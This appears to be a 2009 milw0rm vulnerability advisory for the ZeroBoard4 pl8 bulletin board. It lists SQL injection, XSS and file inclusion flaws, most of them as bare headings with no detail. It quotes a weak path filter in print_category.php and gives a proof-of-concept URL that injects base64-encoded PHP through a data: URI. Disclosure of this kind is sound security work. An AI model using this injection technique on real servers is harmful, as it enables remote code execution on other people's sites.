ZeroBoard4 pl8 (07.12.17) Multiple Remote/Local Vulnerability bY make0day@gmail.com thx to : Flyh4t /************************* ZeroBoard4 (VERSION pl8 (07.12.17))is most famous and widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. There are Remote File Inclusion(?), Local File Inclusion, Blind sql injection vulnerability XSS, and Secret post view Vulnerability. As I know, ZeroBoard4 will not be updated anymore because of zb developer start new project that was called zbxe. If you still use zb4, U d better update to XE! :-) Here is the details: **************************/ TEST ON VERSION ZeroBoard4 pl8 (07.12.17) Download : http://www.zeroboard.com /*************************** [0x01] Blind SQL Injection Vulnerability /wrtie_ok.php /*************************** [0x04] XSS poc: //GNUBoard final version is also insecure. /*************************** [0x05] Remote file Inclusion Vulnerability /include/print_category.php if(eregi(":\/\/",$dir)||eregi("^\.",$dir)) $dir ="./"; //Filtering ..... include "$dir/category_main.php"; //They just filtering :// and . //It looks so perfect to detect RFI //but with php 5.2 & allow_url_include & register_globals that filtering is not secure //By using data:;, we can execute some arbitary php command without %00 *************************/ poc: /include/print_category.php?setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo= # milw0rm.com [2009-02-06]